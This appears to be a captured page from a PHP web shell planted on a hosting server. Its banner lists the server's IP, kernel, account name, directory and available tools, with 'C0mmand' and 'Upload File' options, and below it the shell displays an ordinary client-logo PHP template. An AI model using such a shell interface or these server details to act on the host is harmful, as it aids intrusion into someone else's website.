Server IP : 103.53.40.154 / Your IP : 3.143.237.140 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/arcsol.in/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<div class="section section-padding pt-0"> <div class="container-fluid"> <div class="brand-logo-wrap brand-logo-active swiper"> <div class="section-title text-center mb-lg-9 mb-md-7 mb-5"> <h2 class="title">Our <span> Clients</span></h2> </div> <div class="swiper-wrapper"> <?php $sql = "SELECT * FROM `tbl_client`"; $run = mysqli_query($db,$sql) or die("Query Not run"); while($data = mysqli_fetch_assoc($run)){ ?> <div class="swiper-slide"> <div class="brand-logo"> <!--<a href="about-us.html">--> <img src="<?php echo $wspath?>admin/images/gallery/<?php echo $data['image']?>" alt="Unique"> <!--</a>--> </div> </div> <?php } ?> </div> </div> </div> </div>